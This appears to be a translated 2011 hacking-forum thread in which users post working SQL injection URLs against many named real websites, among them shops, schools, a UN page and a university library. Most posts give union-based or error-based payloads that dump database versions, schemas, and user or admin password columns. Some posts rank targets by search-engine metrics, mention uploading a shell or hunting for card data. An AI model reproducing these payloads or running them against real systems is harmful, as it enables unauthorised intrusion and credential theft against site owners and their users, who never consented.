/index.phtml?mod=seminars&seminarid=89/**/union/**/select/**/1,concat_ws%280x3a,version%28%29,database%28%29,us er%28%29%29,3,4,5,6,7,8
OxoTnik said:
TIC 3500
DB User:
'mba'@'localhost'
Host Name:
nn1.r52.ru
Sql Version:
5.0.51a
site:forum.antichat.ru r52.ru
BLurpi^_^
24.11.2011, 18:43
Code:
http://love.pankotskiy.ru/stat.php?id=1
Code:
http://www.blog-seo.ru/index-stat.php?id=6
there is a table with users (~1k)
Code:
http://brest-school-20.by/stat.php?id=999999.9+union+all+select+concat%280x7 e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+ char%29%29%29%2C0x27%2C0x7e%29%2C0x313032353438303 03536%2C0x31303235343830303536%2C0x313032353438303 03536%2C0x31303235343830303536%2C0x313032353438303 03536--
shadowrun
24.11.2011, 19:21
BLurpi^_^ said:
Code:
http://love.pankotskiy.ru/stat.php?id=1
Code:
http://www.blog-seo.ru/index-stat.php?id=6
Code:
http://www.blog-seo.ru/index-stat.php?id=-6+union+select+group_concat%28column_name%29+from+ information_schema.columns+where+table_name=0x646c 655f7573657273+--+
Code:
http://love.pankotskiy.ru/stat.php?id=-1%27+Union+select+1,2,3,4,5,6,7,8,9,group_concat%2 8version%28%29,user%28%29,database%28%29%29,11,12, 13+from+information_schema.tables+--+
Roughly like this... Just finished it off.
kallstrom
24.11.2011, 19:44
This one doesn't seem to have been posted... Learn English!))
http://www.study.ru/test/test.php?id=91' AND (SELECT 6886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,121,98,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,122,110,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'ivlg'='ivlg
PR=4
TIC=2800
Alexa=71,160
kallstrom
24.11.2011, 20:51
Apartment rentals in Moscow
http://english.fortline.ru/page.php?id=152' AND (SELECT 8467 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,116,117,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,105,117,114,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'ePMO'='ePMO
PR=6
TIC=110
Alexa=481,897
TIC: 450, PR - 6, Alexa - 1,255,744.
http://www.rfdeti[я_не_при_делах_
].ru/announce.php?id=364-999.9+union+select+1,name,3,pwd,5,6,7,8+from+accou nts--
5.1.49-1ubuntu8.1
rfdeti@192.168.0.1
DB: rfdeti
PRosTo_LEva
25.11.2011, 00:44
TIC: 150
http://www.lina-shop.ru/catalog.html?item_id=-99999+UNION+SELECT+1,2,user()+--+
lina-shop_mysql@10.1.135.208
5.1.36-log
kallstrom
25.11.2011, 01:31
Dunlop tires
http://www.dunloptyres.ru/tyre.php?id=172 AND (SELECT 5813 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,115,112,58),(SELECT (CASE WHEN (5813=5813) THEN 1 ELSE 0 END)),CHAR(58,115,111,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
TIC=250
Alexa=439,159
PRosTo_LEva
25.11.2011, 04:06
A rather useless resource:
http://www.thegotomom.com/blog-post.php?id=-1+union+select+1,user(),version(),4,5+--
thegotom_momdb@localhost
5.0.92-community
PRosTo_LEva
25.11.2011, 09:40
http://www.radiesse-voice.com/pages.php?id=-1+union+select+1,2,version(),4,5,6,7+--+
5.0.27-community
Everything's great.. never did figure out the authorization.. the password table is admin_pass
PRosTo_LEva
25.11.2011, 10:30
http://prophecywatchministries.org/pages.php?id=-1+union+select+1,2,version()+--+
5.0.92-community
http://www.johnsonpublishing.com/page.php?id=-1+union+select+1,2,version(),4,5,6,7+--
4.1.22
I want a plus (^^,)
stepashka_
25.11.2011, 14:17
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253+--+
No access
http://www.board.maxido.ru/ind.php?id_typ=113+union+select+1,2,3,4,5,version( ),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+--+
4.1.25-log
http://crimeahouse.net/doska/ind.php?id_typ=6+/*!union+select*/+1,2,3,4,5,/*!column_name*/,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+information_sche ma.columns+where+/*!table_name*/=0x6a6f735f7573657273+--+
http://berdoska.com.ua/ind.php?id_typ=110+union+select+1,2,3,4,5,6,column _name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from +information_schema.columns+where+table_name=0x6a6 f735f7573657273+--+
tabletkO
25.11.2011, 14:49
stepashka_ said:
No access
How about this?)
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253--+1
Outputs the password:
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,USER_PASS,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+timon_re mstroynn.WP_USERS--+1
stepashka_
25.11.2011, 14:59
tabletkO said:
How about this?)
HTML:
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,column_name,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+inform ation_schema.columns+where+table_name=0x57505f5553 455253--+1
No access to USER_PASS
stepashka_ said:
No access to
USER_PASS
the table just sits in another database.
http://board.holod-nnov.ru/ind.php?id_typ=-292+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_l ogin,user_pass),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1+from+timon_remstroynn.wp_users--
kallstrom
25.11.2011, 19:34
MapLib.net - Make your custom Google Maps out of any pictures
http://www.maplib.net/people.php?u=klemperer' AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,112,97,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 8,1),CHAR(58,113,100,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'xhVm'='xhVm
PR=5
TIC=20
Alexa=569,559
BLurpi^_^
25.11.2011, 20:25
http://ledi.ru/news.php?id=223%20union%20all%20select%201,2,3,4,5 ,6--
TIC 100 PR=4
kallstrom
25.11.2011, 23:10
Publishing house «Учитель»
They should not have left the old version of the site up! Through it we get access to the current database:
http://old.uchitel-izd.ru/index.php?option=content&task=view&id=22 AND (SELECT 1816 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,110,101,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,118,118,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=5
TIC=140
Alexa=2,098,739
PRosTo_LEva
26.11.2011, 09:08
stepashka_ said:
http://crimeahouse.net/doska/ind.php?id_typ...........>>>
Following in your footsteps! Thanks for the hint.. =)
TIC: 60
DB version 4
http://www.jeleza.net/ind.php?id_typ=1+union+select+1,2,3,4,5,6,7,versio n%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+--
And a couple more nice and simple SQLi)
TIC 150
DB version 5
http://www.niva.vn.ua/photo.php?num=-1+union+select+1,version%28%29+--
TIC10
DB version 5 - reads nicely.
http://krynycya.org.ua/index.php?cPath=-1+union+select+1,table_name,3+from+information_sch ema.tables+--
There (^^,) God told us to share, right?)))
No more, no less - a hosting provider
Site:www.geromail.com
PR=2
Alexa=10 795 098
Inject
Code:
_ttp://www.geromail.com/search.asp?cmd=Search+Scams/Virus&q=1234'/**/and/**/'a'='a
Version:5.0.51a-community-nt
Database:support
User:support@localhost
I worked it through time-based SQL, so I am posting the table structure so that nobody wastes time for nothing =)
Table structure
stepashka_
27.11.2011, 00:46
http://vetwell.ru/board/index.php?id_typ=248&id_land=1+union+select+1,2,3,4,5,6,concat_ws(0x3a, user(),version(),database()),8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8+--+
VETWELLR_BOARD@LOCALHOST:5.0.92-COMMUNITY-LOG:VETWELLR_BOARD
tabletkO
27.11.2011, 15:14
A directory submission service
HTML:
http://christiantraffic.com/affiliateSignUp.phtml?ID=-1'+and+1=1+union+select+1,2,version(),4,5,6,7,8,us er(),10,11,12,13,14,15,16,17,18--+1
kravch_v
27.11.2011, 23:34
Code:
http://www.rovalis.com/menu.php?id=999999.9+UNION+ALL+SELECT+%28select+co ncat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696 E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C 0x31303235343830303536%2C0x31303235343830303536%2C 0x31303235343830303536%2C0x31303235343830303536%2C 0x31303235343830303536--
Database: rovalisnew2
kallstrom
28.11.2011, 00:00
FOX — Redefining Ride Dynamics
http://www.foxracingshox.com/buy.php?m=bike' AND (SELECT 3140 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,103,100,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 2,1),CHAR(58,120,107,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'oBvH'='oBvH
PR=6
TIC=50
Alexa=139,870
shadowrun
28.11.2011, 00:52
Code:
http://www.muptis.ru/news_podr.php?id=-28+Union+select+1,2,3,group_concat%28username,pwd% 29+from+users+--+
A database of scientific publications in the field of information technology
Code:
http://www.it-science.ru/index.php?page=journal&id=COMPUTERS+%26+MATHEMATICS+WITH+APPLICATIONS%27+ and+1=0+union+select+1,group_concat%28table_name,0 x3b%29,3,4,5+from+information_schema.tables+where+ table_schema=database%28%29+--+
[stranger]
28.11.2011, 02:32
Code:
http://www.vniispk.ru/apple.php?key=-106+union+select+1,2,3,(select+concat_ws(0x3a,user (),version(),database())),5+--+
Yandex TIC 70
Google PageRank 3/10
PRosTo_LEva
28.11.2011, 06:20
Ruslan1817 said:
http://rstcenter.com/forum/43713-%5Bsql%5D-samsungmobilers-ro.rst
ugh.. =(
Then like this (a knight's move):
http://asnapress.net/entry.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11, 12,13--
DB version 5
tabletkO
28.11.2011, 11:21
Shop
HTML:
http://www.plcmusic.co.uk/plcshop_page.php?id=35+union+select+1,user(),versi on(),database(),5,6,7,8,9,10,table_name+from+infor mation_schema.tables--+1
kallstrom
28.11.2011, 16:55
Diving photos.
http://www.visualdiving.com/gallery.php?id=vd_gc01 AND (SELECT 13 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,100,105,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,104,117,113,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
TIC=10
P.S.: There are 6000 databases there, I was stunned))
http://www.mos-stroi.ru/cats.php?id=-94600+union+select+1,2,3,4,5,table_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+from+information_schema.tables--+
4 characters
kravch_v
29.11.2011, 00:23
lightangel said:
http://www.un.org/spanish/News/focus.asp?focusID=13%27
Code:
http://www.un.org/spanish/News/focus.asp?focusID=convert%28int%2Cdb_name%28%29+CO LLATE+SQL_Latin1_General_Cp1254_CS_AS%29+and+1%3D1
User: spwebnews
SQL version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Database: SpanishNews
PHP:
http://new.yalta.ua/dosob/index.php?id_typ=1+union+select+1,2,3,4,5,777,conc at_ws(0x3a,user(),version(),database()),8,5,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
NEW_OLEVER1@192.168.2.5:5.0.51A-LOG:NEW_DOSOB
tabletkO
29.11.2011, 08:13
SHOP
HTML:
http://www.locknlock.com.au/products_c.php?cate1=5&cate2=1&item_seqno=-219+UniOn+sEleCt+antidef+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,version(),user(),con_cat_ws(0x3a, seqno,adminid,passwd,status,grade),21,22,23,24,25, 26,database()+from+admin_01t+LiMit+1,1
HTML:
http://www.locknlock.com.au/admin/
a shell uploads in 0.00001 sec
P.S. The rules forbid posting a password/hash. And I didn't post one =) But I still put in a safeguard
PRosTo_LEva
29.11.2011, 08:17
tabletkO said:
SHOP
a shell uploads in 0.00001 sec
Semyon Semyonych... the rules forbid posting SQLi like this.. The script kiddies will deface it..
And so as not to be all talk:
Zero use, but worth a look for the sheer number of tables))
http://sayna.depar.ru/profile_view.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22+from+information_sc hema.tables--
http://www.abi-nn.ru/profile_view.php?id=-1+union+select+1,2,3,name,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+from+users--
stepashka_
29.11.2011, 13:39
http://www.garo.cc/item.php?id=-879+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,0,1,2+--+
5.0.90-log:u7114@10.8.1.184:u7114 0
http://www.unitedparts.ru/catalog.php?id=2+union+select+table_name,2,3,4+fro m+information_schema.tables
4 characters
stan0009
29.11.2011, 21:18
today I decided to look for card data...
found a couple of SQLi that are useless for that purpose...
sending them to you)
admin panel included)
P.S.: I only worked it as far as the version; the rest is clear, I think, since mysql=>5
sort of like our avito.ru
http://www.fast-buy-sell.com/view_ad.php?id=-1178+union+select+1,2,3,4,5,6,7,8,9,10,11,12,conca t_ws(0x3a,version(),database(),user()),14,15,16,17 ,18,19,20,21,22,23
tours of Chernobyl
http://tourkiev.com/chernobyltour/showdate.php?id=-531+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11
kallstrom
29.11.2011, 22:58
Flash games
http://www.swfplay.net/game.php?id=28) AND (SELECT 7673 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,98,118,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,115,115,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7357=7357
PR=3
PRosTo_LEva
30.11.2011, 01:33
Some interesting weirdness.. all of the hosting's databases can be read..
http://www.springfieldpccc.com/event.php?id=-1+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34+
PRosTo_LEva
30.11.2011, 06:05
Not a bad domain.
DB version 5
but the chance of uploading anything seems negligible.
http://www.ccrw.org/conference/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9--
Something else:
DB version 4, didn't find the admin panel..
TIC 10
http://www.kobyakoffstudio.ru/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,user%28%29--
Code:
http://www.libraries.wvu.edu/databases/database.php?id=-361+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21--
systems@localhost:5.0.77:databases
Google PR: 6
Code:
http://www.rosalcohol.ru/site.php?id=-28+union+select+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7%20from%20use rs--&table=cHJpdl9vdHI=
rosalc_ria-arbitr_ru@zvm34.host.ru:4.0.27-log:rosalc_ria-arbitr_ru
Google PR: 3 TIC: 130
kallstrom
30.11.2011, 11:53
National Union of Cinematographers of Ukraine
http://www.ukrkino.com.ua/news.php?id=2196
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2196 AND 3755=3755
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=2196 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,105,107,112,58)
,IFNULL(CAST(CHAR(114,105,79,117,70,72,119,101,79, 115) AS CHAR),CHAR(32)),CHAR(5
8,119,101,105,58)), NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL